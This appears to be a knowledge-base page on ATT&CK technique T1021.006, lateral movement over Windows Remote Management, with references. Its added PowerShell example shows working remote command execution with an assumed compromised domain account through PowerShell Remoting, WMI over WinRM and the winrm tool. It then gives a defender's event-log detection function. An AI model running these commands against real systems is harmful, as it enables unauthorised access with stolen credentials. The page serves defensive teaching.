T1021.006 · Sub-technique · lateral-movement · agent-callable

T1021.006 Windows Remote Management

Sub-technique of T1021

Platforms: Windows

ATT&CK version: 14.1

What it is

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems over Windows Remote Management (WinRM) and then perform actions on the target as that account. WinRM is the name of both a Windows service and a protocol: Microsoft's implementation of WS-Management, SOAP carried over HTTP (TCP 5985 by default) or HTTPS (TCP 5986), which lets a user interact with a remote system, for example run an executable, modify the Registry, or modify services [5]. It may be invoked with the `winrm` command-line tool or by any number of programs, notably PowerShell Remoting (`Enter-PSSession`, `Invoke-Command`), which executes the remote script block on the target inside `wsmprovhost.exe` under the authenticated account [3]. WinRM can also serve as the transport for remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), so a WMI `Win32_Process.Create` call can arrive through the WinRM listener rather than over DCOM/RPC [4].
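The following is an added worked example, not code from MITRE ATT&CK or from the SQUR knowledge base. It exercises the three invocation paths the description lists (the `winrm` tool, PowerShell Remoting, and WMI over WinRM) with a valid account, and then shows the check a defender would run on the target. The host name `FS01.corp.example`, the account `CORP\svc-backup`, the temp file path, and the presence of Sysmon on the target are all assumptions for the example.

```powershell
# Added example for T1021.006 (not from the ATT&CK page or SQUR).
# Assumed: $Target has a WinRM listener on TCP 5985 and the account is valid.
$Target = 'FS01.corp.example'                 # assumed target host
$Cred   = Get-Credential 'CORP\svc-backup'    # assumed compromised domain account

# 0. Confirm a listener exists. Test-WSMan uses the default HTTP port 5985.
Test-WSMan -ComputerName $Target -ErrorAction Stop | Out-Null

# 1. PowerShell Remoting over WinRM. The script block runs on $Target inside
#    wsmprovhost.exe under $Cred, i.e. "actions as the logged-on user".
Invoke-Command -ComputerName $Target -Credential $Cred -ScriptBlock {
    [pscustomobject]@{
        Host = $env:COMPUTERNAME
        User = "$env:USERDOMAIN\$env:USERNAME"
        Pid  = $PID     # this is the wsmprovhost.exe process on the target
    }
}

# 2. WMI over WinRM. New-CimSession uses the WSMan protocol by default, so the
#    Win32_Process.Create call arrives via the WinRM listener, not DCOM/RPC.
$Cim = New-CimSession -ComputerName $Target -Credential $Cred
Invoke-CimMethod -CimSession $Cim -ClassName Win32_Process -MethodName Create `
    -Arguments @{ CommandLine = 'cmd.exe /c whoami > C:\Windows\Temp\winrm-demo.txt' }  # assumed path
Remove-CimSession $Cim

# 3. The winrm command-line tool issuing the same WMI method over WS-Man.
#    The @{...} argument is single-quoted so PowerShell passes it to winrm.cmd as text.
$Net = $Cred.GetNetworkCredential()
winrm invoke Create wmicimv2/Win32_Process '@{CommandLine="notepad.exe"}' `
    -r:"http://${Target}:5985" -u:"$($Net.Domain)\$($Net.UserName)" -p:$Net.Password

# 4. Defender's check, run on the target. Event 91 in the WinRM operational log
#    is written when a WSMan shell is created for a remote user (path 1).
#    Paths 2 and 3 do not create a shell; their child processes are spawned by
#    WmiPrvSE.exe and look identical to T1047 over DCOM, so they are reported
#    separately. Assumes Sysmon is installed and its operational log is enabled.
function Find-WinRmLateralMovement {
    param([datetime]$Since = (Get-Date).AddHours(-1))

    $shells = Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-WinRM/Operational'; Id = 91; StartTime = $Since
    } -ErrorAction SilentlyContinue | ForEach-Object {
        [pscustomobject]@{ Time = $_.TimeCreated; Source = 'WinRM/91'; Detail = $_.Message }
    }

    $children = Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1; StartTime = $Since
    } -ErrorAction SilentlyContinue | ForEach-Object {
        $x = [xml]$_.ToXml()
        $d = @{}
        $x.Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
        switch -Wildcard ($d.ParentImage) {
            '*\wsmprovhost.exe' { $src = 'Sysmon/1 (PS Remoting)' }
            '*\WmiPrvSE.exe'    { $src = 'Sysmon/1 (WMI, transport unknown)' }
            default             { $src = $null }
        }
        if ($src) {
            [pscustomobject]@{ Time = $_.TimeCreated; Source = $src
                               Detail = "$($d.User) ran: $($d.CommandLine)" }
        }
    }

    @($shells) + @($children) | Sort-Object Time
}

# Run the check on the target itself (again over WinRM, using the same account).
Invoke-Command -ComputerName $Target -Credential $Cred -ScriptBlock ${function:Find-WinRmLateralMovement}
```

Only the PowerShell Remoting path leaves a WSMan shell event (ID 91) and a `wsmprovhost.exe` parent; the two WMI paths are indistinguishable from ordinary WMI execution on the host, so attributing them to WinRM needs the client-side WinRM log or network telemetry on TCP 5985/5986 in addition to the host events above.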

ATT&CK tactics · 1

Lateral Movement

References

  1. MITRE ATT&CK, T1021.006 Windows Remote Management. https://attack.mitre.org/techniques/T1021/006
  2. ThreatPunter, Detecting Lateral Movement Using Sysmon and Splunk. https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bc
  3. Kieran Jacobsen (2014), Lateral Movement with PowerShell. https://www.slideshare.net/kieranjacobsen/lateral-movement-with-power-shell-2
  4. Microsoft, Windows Management Instrumentation (MSDN). https://msdn.microsoft.com/en-us/library/aa394582.aspx
  5. Microsoft, Windows Remote Management (MSDN). http://msdn.microsoft.com/en-us/library/aa384426
Sourced from MITRE ATT&CK Enterprise v14.1. Curated and contextualized for EU compliance use cases by Adam Lundqvist, Founder at SQUR.